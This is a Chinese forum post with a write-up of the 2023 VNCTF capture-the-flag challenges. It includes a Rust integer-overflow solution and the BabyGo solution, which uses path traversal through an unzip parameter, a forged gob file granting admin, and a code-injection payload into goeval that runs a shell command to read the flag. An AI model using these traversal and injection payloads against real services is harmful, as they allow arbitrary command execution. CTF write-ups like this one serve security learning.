qidao123.com ToB IT社区-企服评测·应用市场»论坛 软件与程序人生 后端开发 Java 2023_VNCTF_WP

2023_VNCTF_WP

[复制链接]
发表于 2023-2-19 19:52:41 | 显示全部楼层 |阅读模式
概述

题目来源:buuctf平台举行的vnctf。这次VNCTF还是很好玩的,特别是BabyGo(我也只看了web和misc方式的题),刚好也是在最后的30分钟出了,要不然哭死。6点之前已经有思路要覆盖user.gob文件了,但是一直覆盖不到,后面再认认真真了好几遍才发现path理解错了。拿到这题源码时一直在发呆,一点激情都没有。发现自己打这种比赛永远抢不了一血,一是因为知识储配不过,题刷的不够多;二是因为拿到不熟悉的题就容易发呆。幸好今天还够幸运,解出了花费很长时间的题,要不然又是自闭的一天QAQ。因为能力当前就处于“这样”的阶段,所以做出的BabyGo我给了非常详细的解题过程。

Web

象棋王子

直接f12,然后发现特殊字符,ctrl+c -----------> 控制台 ----------->  ctrl+v 回车后得到flag
电子木鱼

参考这篇文章:https://course.rs/basic/base-type/numbers.html
题目源码:
  1. use actix_files::Files;
  2. use actix_web::{
  3.     error, get, post,
  4.     web::{self, Json},
  5.     App, Error, HttpResponse, HttpServer,
  6. };
  7. use once_cell::sync::Lazy;
  8. use serde::{Deserialize, Serialize};
  9. use std::sync::{Arc, Mutex};
  10. use tera::{Context, Tera};
  12. static GONGDE: Lazy<ThreadLocker<i32>> = Lazy::new(|| ThreadLocker::from(0));
  14. #[derive(Debug, Clone, Default)]
  15. struct ThreadLocker<T> {
  16.     value: Arc<Mutex<T>>,
  17. }
  19. impl<T: Clone> ThreadLocker<T> {
  20.     fn get(&self) -> T {
  21.         let mutex = self.value.lock().unwrap();
  22.         mutex.clone()
  23.     }
  24.     fn set(&self, val: T) {
  25.         let mut mutex = self.value.lock().unwrap();
  26.         *mutex = val;
  27.     }
  28.     fn from(val: T) -> ThreadLocker<T> {
  29.         ThreadLocker::<T> {
  30.             value: Arc::new(Mutex::new(val)),
  31.         }
  32.     }
  33. }
  35. #[derive(Serialize)]
  36. struct APIResult {
  37.     success: bool,
  38.     message: &'static str,
  39. }
  41. #[derive(Deserialize)]
  42. struct Info {
  43.     name: String,
  44.     quantity: i32,
  45. }
  47. #[derive(Debug, Copy, Clone, Serialize)]
  48. struct Payload {
  49.     name: &'static str,
  50.     cost: i32,
  51. }
  53. const PAYLOADS: &[Payload] = &[
  54.     Payload {
  55.         name: "Cost",
  56.         cost: 10,
  57.     },
  58.     Payload {
  59.         name: "Loan",
  60.         cost: -1_000,
  61.     },
  62.     Payload {
  63.         name: "CCCCCost",
  64.         cost: 500,
  65.     },
  66.     Payload {
  67.         name: "Donate",
  68.         cost: 1,
  69.     },
  70.     Payload {
  71.         name: "Sleep",
  72.         cost: 0,
  73.     },
  74. ];
  76. #[get("/")]
  77. async fn index(tera: web::Data<Tera>) -> Result<HttpResponse, Error> {
  78.     let mut context = Context::new();
  80.     context.insert("gongde", &GONGDE.get());
  82.     if GONGDE.get() > 1_000_000_000 {
  83.         context.insert(
  84.             "flag",
  85.             &std::env::var("FLAG").unwrap_or_else(|_| "flag{test_flag}".to_string()),
  86.         );
  87.     }
  89.     match tera.render("index.html", &context) {
  90.         Ok(body) => Ok(HttpResponse::Ok().body(body)),
  91.         Err(err) => Err(error::ErrorInternalServerError(err)),
  92.     }
  93. }
  95. #[get("/reset")]
  96. async fn reset() -> Json<APIResult> {
  97.     GONGDE.set(0);
  98.     web::Json(APIResult {
  99.         success: true,
  100.         message: "重开成功,继续挑战佛祖吧",
  101.     })
  102. }
  104. #[post("/upgrade")]
  105. async fn upgrade(body: web::Form<Info>) -> Json<APIResult> {
  106.     if GONGDE.get() < 0 {
  107.         return web::Json(APIResult {
  108.             success: false,
  109.             message: "功德都搞成负数了,佛祖对你很失望",
  110.         });
  111.     }
  113.     if body.quantity <= 0 {
  114.         return web::Json(APIResult {
  115.             success: false,
  116.             message: "佛祖面前都敢作弊,真不怕遭报应啊",
  117.         });
  118.     }
  120.     if let Some(payload) = PAYLOADS.iter().find(|u| u.name == body.name) {
  121.         let mut cost = payload.cost;
  123.         if payload.name == "Donate" || payload.name == "Cost" {
  124.             cost *= body.quantity;
  125.         }
  127.         if GONGDE.get() < cost as i32 {
  128.             return web::Json(APIResult {
  129.                 success: false,
  130.                 message: "功德不足",
  131.             });
  132.         }
  134.         if cost != 0 {
  135.             GONGDE.set(GONGDE.get() - cost as i32);
  136.         }
  138.         if payload.name == "Cost" {
  139.             return web::Json(APIResult {
  140.                 success: true,
  141.                 message: "小扣一手功德",
  142.             });
  143.         } else if payload.name == "CCCCCost" {
  144.             return web::Json(APIResult {
  145.                 success: true,
  146.                 message: "功德都快扣没了,怎么睡得着的",
  147.             });
  148.         } else if payload.name == "Loan" {
  149.             return web::Json(APIResult {
  150.                 success: true,
  151.                 message: "我向佛祖许愿,佛祖借我功德,快说谢谢佛祖",
  152.             });
  153.         } else if payload.name == "Donate" {
  154.             return web::Json(APIResult {
  155.                 success: true,
  156.                 message: "好人有好报",
  157.             });
  158.         } else if payload.name == "Sleep" {
  159.             return web::Json(APIResult {
  160.                 success: true,
  161.                 message: "这是什么?床,睡一下",
  162.             });
  163.         }
  164.     }
  166.     web::Json(APIResult {
  167.         success: false,
  168.         message: "禁止开摆",
  169.     })
  170. }
  172. #[actix_web::main]
  173. async fn main() -> std::io::Result<()> {
  174.     let port = std::env::var("PORT")
  175.         .unwrap_or_else(|_| "2333".to_string())
  176.         .parse()
  177.         .expect("Invalid PORT");
  179.     println!("Listening on 0.0.0.0:{}", port);
  181.     HttpServer::new(move || {
  182.         let tera = match Tera::new("src/templates/**/*.html") {
  183.             Ok(t) => t,
  184.             Err(e) => {
  185.                 println!("Error: {}", e);
  186.                 ::std::process::exit(1);
  187.             }
  188.         };
  189.         App::new()
  190.             .app_data(web::Data::new(tera))
  191.             .service(Files::new("/asset", "src/templates/asset/").prefer_utf8(true))
  192.             .service(index)
  193.             .service(upgrade)
  194.             .service(reset)
  195.     })
  196.     .bind(("0.0.0.0", port))?
  197.     .run()
  198.     .await
  199. }
复制代码
审计代码,发现使用Cost 会花费掉功德,且在下图所示地方进行计算

 
 结合cost的类型为i32构造quantity的数值,造成溢出,当quantity=2000000000 时 得到flag

 BabyGo

题目源码:
  1. package main
  3. import (
  4.     "encoding/gob"
  5.     "fmt"
  6.     "github.com/PaulXu-cn/goeval"
  7.     "github.com/duke-git/lancet/cryptor"
  8.     "github.com/duke-git/lancet/fileutil"
  9.     "github.com/duke-git/lancet/random"
  10.     "github.com/gin-contrib/sessions"
  11.     "github.com/gin-contrib/sessions/cookie"
  12.     "github.com/gin-gonic/gin"
  13.     "net/http"
  14.     "os"
  15.     "path/filepath"
  16.     "strings"
  17. )
  19. type User struct {
  20.     Name  string
  21.     Path  string
  22.     Power string
  23. }
  25. func main() {
  26.     r := gin.Default()
  27.     store := cookie.NewStore(random.RandBytes(16))
  28.     r.Use(sessions.Sessions("session", store))
  29.     r.LoadHTMLGlob("template/*")
  31.     r.GET("/", func(c *gin.Context) {
  32.         userDir := "/tmp/" + cryptor.Md5String(c.ClientIP()+"VNCTF2023GoGoGo~") + "/"
  33.         session := sessions.Default(c)
  34.         session.Set("shallow", userDir)
  35.         session.Save()
  36.         fileutil.CreateDir(userDir)
  37.         gobFile, _ := os.Create(userDir + "user.gob")
  38.         user := User{Name: "ctfer", Path: userDir, Power: "low"}
  39.         encoder := gob.NewEncoder(gobFile)
  40.         encoder.Encode(user)
  41.         if fileutil.IsExist(userDir) && fileutil.IsExist(userDir+"user.gob") {
  42.             c.HTML(200, "index.html", gin.H{"message": "Your path: " + userDir})
  43.             return
  44.         }
  45.         c.HTML(500, "index.html", gin.H{"message": "failed to make user dir"})
  46.     })
  48.     r.GET("/upload", func(c *gin.Context) {
  49.         c.HTML(200, "upload.html", gin.H{"message": "upload me!"})
  50.     })
  52.     r.POST("/upload", func(c *gin.Context) {
  53.         session := sessions.Default(c)
  54.         if session.Get("shallow") == nil {
  55.             c.Redirect(http.StatusFound, "/")
  56.         }
  57.         userUploadDir := session.Get("shallow").(string) + "uploads/"
  58.         fileutil.CreateDir(userUploadDir)
  59.         file, err := c.FormFile("file")
  60.         if err != nil {
  61.             c.HTML(500, "upload.html", gin.H{"message": "no file upload"})
  62.             return
  63.         }
  64.         ext := file.Filename[strings.LastIndex(file.Filename, "."):]
  65.         if ext == ".gob" || ext == ".go" {
  66.             c.HTML(500, "upload.html", gin.H{"message": "Hacker!"})
  67.             return
  68.         }
  69.         filename := userUploadDir + file.Filename
  70.         if fileutil.IsExist(filename) {
  71.             fileutil.RemoveFile(filename)
  72.         }
  73.         err = c.SaveUploadedFile(file, filename)
  74.         if err != nil {
  75.             c.HTML(500, "upload.html", gin.H{"message": "failed to save file"})
  76.             return
  77.         }
  78.         c.HTML(200, "upload.html", gin.H{"message": "file saved to " + filename})
  79.     })
  81.     r.GET("/unzip", func(c *gin.Context) {
  82.         session := sessions.Default(c)
  83.         if session.Get("shallow") == nil {
  84.             c.Redirect(http.StatusFound, "/")
  85.         }
  86.         userUploadDir := session.Get("shallow").(string) + "uploads/"
  87.         files, _ := fileutil.ListFileNames(userUploadDir)
  88.         destPath := filepath.Clean(userUploadDir + c.Query("path"))
  89.         for _, file := range files {
  90.             if fileutil.MiMeType(userUploadDir+file) == "application/zip" {
  91.                 err := fileutil.UnZip(userUploadDir+file, destPath)
  92.                 if err != nil {
  93.                     c.HTML(200, "zip.html", gin.H{"message": "failed to unzip file"})
  94.                     return
  95.                 }
  96.                 fileutil.RemoveFile(userUploadDir + file)
  97.             }
  98.         }
  99.         c.HTML(200, "zip.html", gin.H{"message": "success unzip"})
  100.     })
  102.     r.GET("/backdoor", func(c *gin.Context) {
  103.         session := sessions.Default(c)
  104.         if session.Get("shallow") == nil {
  105.             c.Redirect(http.StatusFound, "/")
  106.         }
  107.         userDir := session.Get("shallow").(string)
  108.         if fileutil.IsExist(userDir + "user.gob") {
  109.             file, _ := os.Open(userDir + "user.gob")
  110.             decoder := gob.NewDecoder(file)
  111.             var ctfer User
  112.             decoder.Decode(&ctfer)
  113.             if ctfer.Power == "admin" {
  114.                 eval, err := goeval.Eval("", "fmt.Println("Good")", c.DefaultQuery("pkg", "fmt"))
  115.                 if err != nil {
  116.                     fmt.Println(err)
  117.                 }
  118.                 c.HTML(200, "backdoor.html", gin.H{"message": string(eval)})
  119.                 return
  120.             } else {
  121.                 c.HTML(200, "backdoor.html", gin.H{"message": "low power"})
  122.                 return
  123.             }
  124.         } else {
  125.             c.HTML(500, "backdoor.html", gin.H{"message": "no such user gob"})
  126.             return
  127.         }
  128.     })
  130.     r.Run(":80")
  131. }
复制代码
审计代码过程,在路径/upload下我们可以知道禁止上传了.gob和.go文件审计/unzip路径,我们可以知道这里把上传的.zip文件进行解压,关键点在下图所示这里存在一个参数path,用于设置解压.zip文件后,解压文件存放的位置。这里存在filepath.Clean函数,查阅资料发现可以类似目录穿越相关资料链接:https://blog.csdn.net/weixin_45011728/article/details/96615369进行审计/backdoor路径,关键点如下图所示:这里打开一个user.go的文件,调用了gob.NewDecoder函数,查阅资料发现gob文件为go的二进制文件,相关链接如下:http://c.biancheng.net/view/4563.html
在这里还设置了一个参数pkg,调用了goeval.Eval()函数,不认识然后百度查阅资料学习,在该链接明白用处:https://learnku.com/articles/57884综上分析,大概解题思路是:上传一个zip文件,里面包含了user.gob,user.gob的内容要把ctfer.Power原来的值覆盖掉,改成admin才行。然后此时只是输出了Good,并没有得到flag,找到了下面文章:https://cn-sec.com/archives/1281015.html了解到go的函数逃逸,从而getshell获取flag。解题步骤如下:1. 在/upload中上传了包含user.gob的zip文件,user.gob文件内容如下:
  1. //user.go
  2. package main
  4. import (
  5.     "encoding/gob"
  6.     "fmt"
  7.     "os"
  8. )
  10. type User struct {
  11.         Name  string
  12.         Path  string
  13.         Power string
  14. }
  16. func main(){
  17.         userDir := "/tmp/bd79ef7e97e0846c1b876078b346ad18/"  //自己docker起后的路径
  18.         user := User{Name: "ctfer", Path: userDir, Power: "admin"}
  19.         file, err := os.Create("./user.gob")
  20.         if err != nil {
  21.                 fmt.Println("文件创建失败", err.Error())
  22.         return
  23.         }
  24.         defer file.Close()
  26.         encoder := gob.NewEncoder(file)
  27.         err = encoder.Encode(user)
  28.         if err != nil {
  29.         fmt.Println("编码错误", err.Error())
  30.         return
  31.     } else {
  32.         fmt.Println("编码成功")
  33.     }
  34. }
复制代码
运行上面user.go文件得到user.gob文件2. 在/unzip路径下,使用payload如下:
  1. /unzip?path=../../../tmp/bd79ef7e97e0846c1b876078b346ad18/
复制代码
3. 访问/backdoor,返回Good则上述步骤成功
4. 在/backdoor下,使用下面payload:
  1. /backdoor?pkg=os/exec"%0A"fmt")%0Afunc%09init()%7B%0Acmd:=exec.Command("/bin/sh","-c","cat${IFS}/f*")%0Ares,err:=cmd.CombinedOutput()%0Afmt.Println(err)%0Afmt.Println(res)%0A}%0Aconst(%0AMessage="fmt
复制代码
payload的构造参考上述给的链接
5. 得到返回结果:

 6. python脚本解码得到flag:flag{b9dd39fb-76b9-4b90-888c-833d81bbcdac}
Misc

验证码

把图片数字提取出来,使用该网站解密即可:https://tuppers-formula.ovh/ 
 得到flag:flag{MISC_COOL!!}
 
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

返回列表

水军大提督
+ 我要发帖

登录后关闭弹窗

登录参与点评抽奖  加入IT实名职场社区
去登录
快速回复 返回顶部 返回列表